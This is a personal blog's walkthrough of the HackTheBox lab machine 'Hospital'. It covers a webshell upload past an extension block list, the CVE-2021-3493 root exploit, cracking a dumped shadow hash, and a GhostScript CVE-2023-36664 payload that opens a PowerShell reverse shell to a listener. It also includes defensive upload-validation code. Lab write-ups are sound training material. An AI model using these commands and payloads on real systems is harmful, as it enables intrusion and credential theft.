cwoellner.com ~ personal website & blog

Writeup of Hospital From HackTheBox

Published on: Thursday, Dec 19, 2024

Getting a foothold

For the initial port scan, I use the following nmap command:

nmap -sS -A -Pn -T5 -p- -oN nmap.txt 10.129.229.189

And receive the following results:

PORT     STATE  SERVICE           VERSION
22/tcp   open   ssh               OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 e1:4b:4b:3a:6d:18:66:69:39:f7:aa:74:b3:16:0a:aa (ECDSA)
|_  256 96:c1:dc:d8:97:20:95:e7:01:5f:20:a2:43:61:cb:ca (ED25519)
53/tcp   open   domain            Simple DNS Plus
88/tcp   open   kerberos-sec      Microsoft Windows Kerberos (server time: 2023-11-19 04:40:02Z)
135/tcp  open   msrpc             Microsoft Windows RPC
139/tcp  open   netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open   ldap              Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after:  2028-09-06T10:49:03
443/tcp  open   ssl/http          Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
|_http-title: Hospital Webmail :: Welcome to Hospital Webmail
445/tcp  open   microsoft-ds?
464/tcp  open   kpasswd5?
593/tcp  open   ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp  open   ldapssl?
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after:  2028-09-06T10:49:03
1801/tcp open   msmq?
2103/tcp open   msrpc             Microsoft Windows RPC
2105/tcp open   msrpc             Microsoft Windows RPC
2107/tcp open   msrpc             Microsoft Windows RPC
2179/tcp open   vmrdp?
3268/tcp open   ldap              Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after:  2028-09-06T10:49:03
3269/tcp open   globalcatLDAPssl?
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
| Not valid before: 2023-09-06T10:49:03
|_Not valid after:  2028-09-06T10:49:03
3389/tcp open   ms-wbt-server     Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC.hospital.htb
| Not valid before: 2023-09-05T18:39:34
|_Not valid after:  2024-03-06T18:39:34
5985/tcp open   http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6059/tcp open   msrpc             Microsoft Windows RPC
6404/tcp open   msrpc             Microsoft Windows RPC
6406/tcp open   ncacn_http        Microsoft Windows RPC over HTTP 1.0
6407/tcp open   msrpc             Microsoft Windows RPC
6409/tcp open   msrpc             Microsoft Windows RPC
6615/tcp open   msrpc             Microsoft Windows RPC
6636/tcp open   msrpc             Microsoft Windows RPC
8080/tcp closed http-proxy
9389/tcp open   mc-nmf            .NET Message Framing

I start by checking the service on port 443 and discover an instance of Roundcube webmail. Since there are no recent unauthenticated exploits for Roundcube, I check the other services. On port 8080 I find a simple web app that allows me to create an account and upload a file. I use the p0wny@shell:~# webshell and try different file extensions. The upload succeeds with a .phar file extension. The uploaded file can be found in the /uploads/ directory.
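The .phar bypass works because the upload form relies on an extension block list. As an added illustration (my own code, not the box's application or anything from the writeup), here is that weak check next to an allow-list validator that also verifies magic bytes and discards the client-supplied name; the extension lists, magic bytes and function names are assumptions for this example:

```python
import re
import secrets
from typing import Optional

# Weak design modelled on the writeup: a block list that names only ".php",
# so "shell.phar" (which Apache's PHP handler also executes) slips through.
BLOCKED_EXTENSIONS = {"php"}

# Hardened design: an allow list of extensions the server never hands to PHP,
# each paired with the magic bytes the content must start with.
# (Assumed lists for this example, not the box's real configuration.)
ALLOWED_TYPES = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
    "pdf": b"%PDF-",
}

def blocklist_accepts(filename: str) -> bool:
    """The weak check: only the final extension is compared against the block list."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext not in BLOCKED_EXTENSIONS

def allowlist_accepts(filename: str, content: bytes) -> Optional[str]:
    """The hardened check: returns the canonical extension, or None to reject.

    Rejects more than one dot (double extensions such as "x.php.jpg", which a
    permissive AddHandler would still run), any extension outside the allow
    list, and content whose magic bytes do not match the declared type.
    """
    base = filename.rsplit("/", 1)[-1].rsplit("\\", 1)[-1]  # drop path components
    if not re.fullmatch(r"[A-Za-z0-9_-]+\.[A-Za-z0-9]+", base):
        return None
    ext = base.rsplit(".", 1)[1].lower()
    magic = ALLOWED_TYPES.get(ext)
    if magic is None or not content.startswith(magic):
        return None
    return ext

def stored_name(ext: str) -> str:
    """Never keep the client's name: a random one defeats guessing /uploads/<name>."""
    return f"{secrets.token_hex(16)}.{ext}"

# Beyond the validator, serve the uploads directory with PHP execution disabled
# (Apache + mod_php: "php_flag engine off" for that directory), so even a
# misnamed upload is returned as bytes rather than run.
```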

Pwning the container

Using the shell I find out that I am in an Ubuntu container.

www-data@webserver:…/html/uploads uname -a
Linux webserver 5.19.0-35-generic #36-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb 3 18:36:56 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux

I try to exploit CVE-2021-3493, which tends to work on most Ubuntu systems. I upload the exploit and run it. It works, but the webshell cannot handle it, so I use the webshell to run a reverse shell and use the exploit from there.

After running the exploit again and getting a root shell, I take a look at /etc/shadow and dump the password hash for drwilliams.

drwilliams:$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/:19612:0:99999:7:::

I then use hashcat to crack the password.

hashcat -m 1800 pw.hash rockyou.txt --show
$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/:qwe123!@#

User flag

Using the credentials drwilliams:qwe123!@# I log into Roundcube webmail. I find a mail telling me to send a GhostScript file. So I look for recent GhostScript RCEs and find CVE-2023-36664.

[screenshot: mail]

I use RevShells to generate a Base64 encoded PowerShell reverse shell and add the code as the payload for the exploit generator.

python3 CVE_2023_36664_exploit.py -g -x eps -p "powershell -e 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"

I send the generated .eps file to Dr. Brown and wait for the reverse shell to connect back to my listener.

$ nc -lnvp 1234
Listening on 0.0.0.0 1234

Connection received on 10.129.229.189 6230
PS C:\Users\drbrown.HOSPITAL\Documents> 

Now I can use the reverse shell to navigate to the Desktop folder and obtain the user flag.

Administrator flag

I start by running winpeas and see that I have write access to C:\xampp, so I check the folder and find out that this is where Roundcube is being hosted.

I put the p0wny@shell:~# from earlier in the htdocs folder (this time as a .php file) and access it via the browser.

[screenshot: system shell]

Now I can use the shell to obtain the root flag from the Administrator's desktop.